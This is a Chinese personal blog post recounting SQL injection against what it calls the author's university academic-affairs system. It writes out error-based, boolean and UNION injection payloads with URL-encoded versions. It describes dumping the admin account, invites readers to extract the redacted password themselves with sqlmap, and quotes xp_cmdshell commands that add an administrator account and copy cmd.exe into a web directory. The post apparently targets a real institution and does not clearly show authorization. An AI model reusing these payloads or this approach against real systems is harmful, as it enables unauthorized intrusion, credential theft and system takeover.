终于考完试了,又可以继续我的渗透之旅了。昨晚通宵和Lucas把今年暑假成都的信息安全竞赛的文档给整理了,貌似这是自从大一那次通宵一来第一次通宵了。
ISCC的比赛到10号就结束了,暑假到北京绿盟去决赛应该没问题了,所以这段时间针对WEB渗透和Buffer OverFlow作了很多练习,主要是SQL注入。整个过程实在太蛋疼了,感觉sql注入实在不是一件简单的事,期间各种纠结,突然有种感觉sql注入之所以这么复杂是因为变化太多了,针对不同的数据库,不同的开发语言,不同的编码风格,甚至还遇到了蛋疼的WAF过滤就会有不同的渗透方案,就像孙子兵法上写的:知己知彼,因地制宜之类的。
这段时间和郭子,小豪一直在作教务处的渗透测试,这里对这段时间的学习和渗透做一个总结吧,包括对江大教务系统和正方系统的渗透经历,还有从各种博客和论坛上看到的牛人帖子,希望能对其他人有一点借鉴作用。
好!废话不多说,开始我们的SQL注入之旅。
1. 踩点
我选择的目标是教务系统 ******.com/index.asp,在开始sql注入之前我先进行了一下踩点,这步主要有几个目标:
1)判断目标主机是否有sql注入漏洞,发现sql注入的位置
一般来说,sql注入一般存在于形如:******.edu.cn/NewsInfo.asp?id=1429 等带有参数的ASP动态网页中,有时一个动态网页中可能只有一个参数,有时可能有N个参数,有时是整型参数,有时是字符串型参数。
找到可能的注入点之后,就要开始进行一些试探,对这种技术我的理解是本质上是利用了ASP, PHP等程序的报错机制,即人工构造以一种输入,使原本的正常的程序流出现错误,而如果coder在写代码的时候没有做防御型编程 try catch之类的,就有可能导致错误信息显示,从而暴露一些数据库信息,这么说比较抽象,我们拿一条典型的sql语句作比方。
select * from admin where id = 1234($id);
如果我们在输入的时候多加一个单引号 ********.com/NewsInfo.asp?id=1429' 就会导致 select * from admin where id = 1234' 运行异常。
从报错的结果可以看出,教务处的服务器使用的数据库是Access数据库(这里有点蛋疼,貌似教务处的某些页面没有纳入WAF防御体系,有些奇怪)
如果为了进一步确认注入点的真实性,可以构造下面的输入:
****.com/NewsInfo.asp?id=1429 and 1=1
****.com/NewsInfo.asp?id=1429 and 1=2
经过以上的踩点,现在我们基本可以确认sql注入点的存在了。
(2)区分数据库服务器类型
这一步也很重要,因为在文章的开头就提到了,sql注入是个因材施教,因地制宜的技术。必须根据不同的数据库,不同的开发语言进行构造输入语句,才能有针对性的进行注入渗透,我们这里情况算比较好了,在第一步踩点的时候就探出了数据库类型是Access,如果第一步不能得到这些信息,我们也有方法。 下面是摘自ISCC的一段技术博文。
一般来说,ACCESS与SQL-SERVER是最常用的数据库服务器,尽管它们都支持T - SQL标准,但还有不同之处,而且不同的数据库有不同的攻击方法,必须要区别对待。
1、 利用数据库服务器的系统变量进行区分
SQL-SERVER有user,db_name()等系统变量,利用这些系统值不仅可以判断SQL-SERVER,而且还可以得到大量有用信息。如:
① and user>0 不仅可以判断是否是SQL-SERVER,而还可以得到当前连接到数据库的用户名
②&n ... db_name()>0 不仅可以判断是否是SQL-SERVER,而还可以得到当前正在使用的数据库名;
2、利用系统表
ACCESS的系统表是msysobjects,且在WEB环境下没有访问权限,而SQL-SERVER的系统表是sysobjects,在WEB环境下有访问权限。对于以下两条语句:
① and (select count(*) from sysobjects)>0
② and (select count(*) from msysobjects)>0
若数据库是SQL-SERVE,则第一条,abc.asp一定运行正常,第二条则异常;若是ACCESS则两条都会异常。
好!看到这里,我必须再重提一下本文的主题:SQL注入的精髓是因地制宜,在不同的环境中要具体情况具体分析,还要牢记的是巧妙的运用数据库的报错信息(如果有的话)这两条原则。
我们回到我们的案例:教务系统。
前期用nmap扫描,发现了教务的一个老的后台登入界面,这个界面貌似没有做输入过滤,也没有WAF防御:
首先,我的思考方向应该是这次的sql注入应该是POST注入,因为是表单登入。
我们的目标是通过POST注入,获得数据库版本等信息。
发现如果改变用户名的输入:admin' or '1'='1,弹出的消息是密码错误,而直接随便输一个帐号random,则弹出帐号不存在。说明了这个登入页面没有对输入进行过滤。
为了加快手工注入的速度,这里我使用WebScarab这款java程序,手工构造POST数据包。
对sql语句在注入前进行URL编码
admin' or (select count(*) from sysobjects)>0
admin%27+or+%28select+count%28*%29+from+sysobjects%29%3E0%3B--
二值逻辑返回期望结果,即密码错误,说明帐号是对的(这个逻辑一定要搞清楚),证实是sqlserver数据库
这里要注意的一点是:URL编码,刚开始的时候忘记编码了,结果一直不对。如果是手工构造数据包一定要记得URL编码。
2. 构造sql语句爆出数据表和记录
接下来,我们需要知道数据表等信息。
admin' or user>0;--
admin%27+or+user%3E0%3B--
不仅可以判断是否是SQL-SERVER,而还可以得到当前连接到数据库的用户名
爆出当前数据库用户名(指登入这个数据库的用户名):jw
这里利用了之前说的报错逻辑,我们的命令是让数据库判断user和0的大小,但是user是string,而0是int。强制类型转换会出错,所有就间接得到了我们要的结果
这就是巧妙利用错误报错的机制,下面的思路也是类似的。
admin' or db_name()>0;--
admin%27+or+db_name%28%29%3E0%3B--
不仅可以判断是否是SQL-SERVER,而还可以得到当前正在使用的数据库名
爆出当前数据库名(对应这个服务的数据库的名称):jxgl
开始爆破表名:
admin' or (select count(*) from users)>0;--
admin%27+or+%28select+count%28*%29+from+user%29%3E0%3B--
返回了期望结果,表名很可能是: users
开始爆破字段名:
admin' or (select count(xh) from users)>0;--
admin%27+or+%28select+count%28xsxh%29+from+users%29%3E0%3B--
字段:
xh
kl
开始爆破表中第一天记录的值(因为这很有可能就是管理员的帐号信息)
admin' or (select top 1 len(xh) from users)>0;--
admin%27+or+%28select+top+1+len%28xh%29+from+users%29%3E0%3B--
从0到10一个个试
在3的时候卡住,所有xh的长度为: 3位
在7的时候卡住,所有xh的长度为: 7位
继续
admin' or (select top 1 ASCII (SUBSTRING(xh,1,1)) from users)>0;--
admin%27+or+%28select+top+1+ASCII+%28SUBSTRING%28xh%2C1%2C1%29%29+from+users%29%3E0%3B--
xh:wjj
kl:********(是一个7位的数字,这里不方便透露了,有兴趣的可以自己手工或者用sqlmap爆出来)
到这里,我们针对这个页面的的sql注入基本算是成功了,即得到了管理的帐号和密码。
但是蛋疼的是,这个页面貌似是一个老的页面,已经不用了,所以这个帐号没法登入到真正的后台,登入后又弹出一个新的界面,这个才是真正的后台..............当时还以为已经成功了,汗,白高兴了一场。
后来,是郭子发现了教务处前台的某些页面存在过滤不当的现象,可以使用UNION思路进行sql注入
在输入的后面加上 union+(select+1,2,3,4,5,6+from+admin)这种联合查询语句,能够得到管理的帐号和密码。这让我感觉一下子大开了眼界,原来一直忘了还有联合查询这一招。
关于UNNION查询,我的理解是这样的:
在输入union+(select+1,id,3,password,username,6+from+admin)
的时候,发现页面上原来显示其他字段的地方出现了不同的字样,原理是这样的,union需要相同数量的字段进行联合查询,然后会覆盖到原来的指定区域
所以这里的关键是根据返回结果的变化试出表中的字段名,而且在联合查询中所选定的两个数据表或查询中的列数必须要匹配。
因为在union查询中,union的字段数必须和原来的的一样才行,也就是说,我们可以根据这个二值逻辑(还是利用错误报错机制),试出表名,字段数,字段名信息,因为只有当这些项都正确时,页面才能显示正常,相关区域才会有值。
通过构造正确的union查询语句,成功得到了管理员的帐号和密码。
登入成功!
3. sql提权
这一步的情况比较难实现,因为经过我的实验,大部门的数据库软件在安装的时候都默认关闭了cmd执行权限。
下面是ZDNet上的一篇帖子:
若当前连接数据的帐号具有SA权限,且master.dbo.xp_cmdshell扩展存储过程(调用此存储过程可以直接使用操作系统的shell)能够正确执行,则整个计算机可以通过以下几种方法完全控制,以后的所有步骤都可以省
1、&nb ... er>0 abc.asp执行异常但可以得到当前连接数据库的用户名(若显示dbo则代表SA)。
2、 ... me()>0 abc.asp执行异常但可以得到当前连接的数据库名。
3、;exec master..xp_cmdshell “net user aaa bbb /add”-- (master是SQL-SERVER的主数据库;名中的分号表示SQL-SERVER执行完分号前的语句名,继续执行其后面的语句;“—”号是注解,表示其后面的所有内容仅为注释,系统并不执行)可以直接增加操作系统帐户aaa,密码为bbb。
4、 ;exec master..xp_cmdshell “net localgroup administrators aaa /add”-- 把刚刚增加的帐户aaa加到administrators组中。
5、 ;backuup database 数据库名 to disk='c:inetpubwwwrootsave.db' 则把得到的数据内容全部备份到WEB目录下,再用HTTP把此文件下载(当然首选要知道WEB虚拟目录)。
6、通过复制CMD创建UNICODE漏洞
;exe ... dbo.xp_cmdshell “copy c:winntsystem32cmd.exe c:inetpubscriptscmd.exe” 便制造了一个UNICODE漏洞,通过此漏洞的利用方法,便完成了对整个计算机的控制(当然首选要知道WEB虚拟目录)。
以上就是渗透教务处的过程,感觉sql注入真的是一门大学问,这方面的经验太少了,要真正掌握sql注入的精髓还需要多多研究,总结。SQL注入的研究暂时先搁到一边,赶紧把0DAY给看完,估计到了决赛会用到很多那本书上的知识。
本来想继续写渗透学校正方成绩系统的和WAF绕后的一些感悟的,无奈东西太多了,还是分开来研究吧,过段时间再写篇关于WAF绕过方面的SQL注入的文章。希望能把易玲大神的那几篇文章通读几篇,还有几个国外的将WAF绕后的,做一个总结。
阅读(2295) | 评论(0) | 转发(0) |